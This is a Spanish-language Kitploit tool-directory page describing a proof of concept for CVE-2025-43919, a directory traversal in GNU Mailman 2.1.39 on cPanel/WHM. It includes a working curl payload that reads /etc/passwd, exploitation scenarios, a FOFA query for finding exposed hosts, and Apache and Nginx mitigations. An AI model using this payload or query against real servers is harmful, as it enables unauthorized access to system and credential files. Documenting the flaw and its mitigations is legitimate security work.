Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/cybersecplayground/cve-2025-43919-poc
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubcybersecplayground/cve-2025-43919-poc

CVE-2025-43919-POC

Se ha descubierto una nueva vulnerabilidad en GNU Mailman 2.1.39, incluido con cPanel/WHM, que permite a atacantes remotos no autenticados leer archivos arbitrarios en el servidor a través de una falla de directory traversal.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
111hace 1 añoAún no revisado
Compartir

🚨 CVE-2025-43919: Directory Traversal en GNU Mailman 2.1.39 (cPanel/WHM)

Se ha descubierto una nueva vulnerabilidad en GNU Mailman 2.1.39, incluido con cPanel/WHM, que permite a atacantes remotos no autenticados leer archivos arbitrarios en el servidor a través de una falla de Directory Traversal.

📌 Resumen de la vulnerabilidad:

  • Tipo: Directory Traversal (No autenticado)
  • Componente: private.py CGI script
  • Endpoint afectado: /mailman/private/mailman
  • Impacto: Revelación de archivos como /etc/passwd, .mbox archives y configuraciones de Mailman
  • Puntuación CVSS: 5.8 (Medio)
  • ID CVE: CVE-2025-43919

Estado: Sin parche oficial (Mailman 2.1.x está al final de su vida útil)

🔥 Prueba de concepto:

root@kitploit:~
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman

🧨 Escenarios de explotación:

  • Volcar /etc/passwd, configuraciones o archivos de buzón
  • Filtrar credenciales y archivos sensibles
  • Encadenar con otros bugs para RCE o escalada

🛡️ Mitigaciones: Bloquear el acceso a /mailman/private a nivel del servidor web:

root@kitploit:~
<Location "/mailman/private">
    Require ip 127.0.0.1
    Deny from all
</Location>

O en Nginx:

root@kitploit:~
location /mailman/private {
    deny all;
    return 403;
}

⬆️ Migrar a Mailman 3.x — 2.x está EOL y carece de protecciones modernas

🔍 Consulta FOFA : app="Mailman"

📚 Aprende más, comparte responsablemente y mantén tu infraestructura segura.

🔒 Sigue para más CVEs del mundo real, PoCs y consejos de endurecimiento: 👉 @cybersecplayground

#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity

Descargar herramienta